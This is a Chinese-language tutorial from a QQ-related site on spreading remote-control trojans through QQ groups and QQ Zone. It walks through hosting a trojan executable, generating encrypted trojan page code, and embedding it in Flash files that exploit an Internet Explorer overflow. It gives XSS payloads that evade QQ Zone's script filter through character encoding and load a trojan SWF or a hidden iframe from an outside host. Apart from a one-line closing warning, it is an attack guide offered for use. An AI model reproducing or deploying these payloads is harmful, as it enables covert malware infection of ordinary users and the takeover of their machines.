一、QQ群中簡簡單單掛木馬
在一個比較火的QQ群里掛上網(wǎng)頁木馬,一定很容易得到許多肉雞的。怎么在QQ群里掛馬,是在群里面群發(fā)木馬的網(wǎng)址嗎?現(xiàn)在已經(jīng)不會有人上這樣的當(dāng)了。我們要作的只是在群里面發(fā)一個作了手腳的帖子。
步驟一:制作網(wǎng)頁木馬
在攻擊前,我們首先要制作好一個木馬網(wǎng)頁。這里筆者使用了“上興遠程控制木馬V2006”,這個木馬功能非常強,以前筆者曾作過介紹。用上興生成木馬服務(wù)端程序“muma.exe”后,將服務(wù)端上傳到某個網(wǎng)站上去,假設(shè)地址為“http://www.binghewu.com.cn/muma.exe”。
打開“南域劍盟網(wǎng)頁木馬生成器”,在中間的“URL”處填入木馬的鏈接地址,點擊“生成”按鈕,將會在生成器當(dāng)前目錄下生成一個名為“script.txt”的文件(如圖1)。用記事本打開剛才生成的“script.txt”文件,可以看到木馬代碼,代碼是經(jīng)過加密的,一般人很難看出這是網(wǎng)頁木馬代碼來(如圖2)。復(fù)制所有代碼,然后將代碼插入到任意一個正常的網(wǎng)頁中,就可以得到一個網(wǎng)頁木馬了。
小提示:將木馬代碼插入正常的網(wǎng)頁中,其位置一般是位于“”標(biāo)記中間。
圖1 用木馬生成器生成木馬代碼
圖2 加密的木馬代碼
步驟二:制作SWF木馬
在以前的QQ群中,本來只需要發(fā)一張帶圖片的帖子就可以實現(xiàn)掛馬的目的。不過現(xiàn)在QQ群也改版了,掛馬就需要多一個步驟了,我們還需要將網(wǎng)頁木馬嵌入Flash文件中。
打開“SWF插馬工具(Icode To SWF)”,在“SWF文件”中瀏覽選擇本機上的某個正常的Flash文件;在“插入代碼”中填寫剛才與在的網(wǎng)頁木馬的鏈接地址(如圖3)。然后點擊“給我插”按鈕,即可將網(wǎng)頁木馬鏈接插入到正常的Flash文件中了。SWF插馬工具生成的Flash文件是利用了一個IE漏洞,對方打開Flash文件后,就會造成IE溢出,自動訪問木馬網(wǎng)頁在后臺下載運行木馬程序。
圖3 生成SWF木馬
步驟三:在QQ群中掛馬
首先將剛才生成的SWF木馬文件上傳到某個空間中,然后打開某個QQ群的BBS欄目,點擊“發(fā)表新文章”。在新文章書寫頁面中點擊“插入Flash”按鈕,輸入SWF木馬文件的網(wǎng)絡(luò)鏈接地址及長寬,然后點擊后面的小鉤按鈕,插入Flash文件(如圖4)。發(fā)表新文章后,當(dāng)有人在QQ群中打開查看這篇文章時,就會自動播放Flash并在后臺下載運行上興木馬服務(wù)端了。
圖4 在QQ群中發(fā)布Flash木馬
小提示:當(dāng)然我們也可以直接在QQ群中散布SWF木馬文件的網(wǎng)址,別人點擊后一樣會中木馬,不過這種方式不如發(fā)布文章隱蔽和效果好,攻擊的持續(xù)性也不強。
二、QQ空間玩掛馬
自從騰訊推出QQ空間(QQ-zone)后,各種跨站漏洞便不斷暴出。雖然騰訊已經(jīng)對QQ-zone進行了一次全面的更新,禁止了運行自定義腳本,不過通過我們的測試,發(fā)現(xiàn)所做的限制是很簡單的,只需要轉(zhuǎn)換一下字符就可以突破限制,在QQ空間上任意掛馬。
方法一:掛Flash木馬
打開QQ空間后,在頁面中點擊“自定義”按鈕,在彈出的工具條上依次單擊“個性設(shè)置”→“新建模塊”命令,也可在QQ空間頁面中直接按下+組合鍵,打開自定義對話框。在彈出的網(wǎng)頁對話框中輸入任意“模塊名稱”,點擊“提交”按鈕,彈出創(chuàng)建成功的提示框。然后出現(xiàn)“添加內(nèi)容”對話框,將其中的“網(wǎng)址”、“圖片”中自帶的“http://”刪除,保持“鏈接名稱”為空白。在“評論”中輸入如下代碼(如圖5):
以下是引用片段:
“<img src="javascri&#112;t:document.getElementById('Mlogo').innerHTML+='<div style=\'position:absolute;top:0;left:0;\'><EMBED src=\'http://www.binghewu.com.cn/muma.swf\' quality=high wmode=\'transparent\' WIDTH=\'925\' HEIGHT=\'655\' TYPE=\'application/x-shockwave-flash\'></div>';"> ”
代碼中的Flash地址“http://www.binghewu.com.cn/muma.swf”,是剛才制作上傳的SWF木馬鏈接地址,可以更改為其它任意Flash木馬文件地址。提交代碼后,用戶進入此QQ空間時,會自動打開顯示上傳的SWF木馬Flash,從而在后臺下載運行上興木馬服務(wù)端程序。
圖5 通過自定義模塊添加SWF木馬
小提示:QQ空間是通過檢測用戶提交的代碼中,是否含用“javascript”之類的字符進行過濾的。在上面的代碼中,將腳本部分代碼用ASCII編碼之后替換躲過了過濾,如“javascript”可以替換為“javascrip”,“p”為“p”的ASCII編碼。具體ASCII編碼轉(zhuǎn)換可到“http://www.killadm.ful.cn/ascii.asp”查詢(如圖6)。
圖6 通過網(wǎng)頁轉(zhuǎn)換字符ASCII碼
方法二:掛網(wǎng)頁木馬
上面的方法是直接在QQ空間中掛上一個Flash木馬文件,實現(xiàn)的方法雖然比較簡單,不過這個Flash文件有可能會讓別人起疑心。既然我們可以在QQ空間中寫入自定義代碼,何不干脆直接掛上網(wǎng)頁木馬呢?
用上面同樣的方法新建一個模塊,代碼如下:
以下是引用片段:
“<div id=DI><img src="javascript:DI.innerHTML='<iframe src="http://www.binghewu.com.cn/muma.htm" width=190 height=190 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no></iframe>'" style=display:none></div>”
同樣的,在上面的代碼中已經(jīng)作了ASCII碼轉(zhuǎn)換躲過過濾;“http://www.binghewu.com.cn/muma.htm”是網(wǎng)頁木馬的鏈接地址,可以換成其它木馬網(wǎng)頁地址。代碼中的其它語句是用來定義模塊大小的,由于設(shè)置為0,該模塊將在QQ空間中被隱藏,但是并不影響木馬網(wǎng)頁的打開與運行。這里為了說明攻擊效果,筆者對代碼作了一些修改,將木馬網(wǎng)頁顯示為新浪首頁,說明完全可以在QQ空間中打開其它木馬網(wǎng)頁的(如圖7)。
圖7 在QQ空間中掛上的新浪頁面
怎么樣,在QQ群和QQ空間中掛馬是不是很簡單?希望大家在上網(wǎng)的時候注意一下了。
關(guān)于騰牛 | 聯(lián)系方式 | 發(fā)展歷程 | 版權(quán)聲明 | 下載幫助(?) | 廣告聯(lián)系 | 網(wǎng)站地圖 | 友情鏈接
Copyright 2005-2018 QQTN.com 【騰牛網(wǎng)】 版權(quán)所有 鄂ICP備17010784號-1 | 鄂公網(wǎng)安備 42011102000245號
聲明: 本站非騰訊QQ官方網(wǎng)站 所有軟件和文章來自互聯(lián)網(wǎng) 如有異議 請與本站聯(lián)系 本站為非贏利性網(wǎng)站 不接受任何贊助和廣告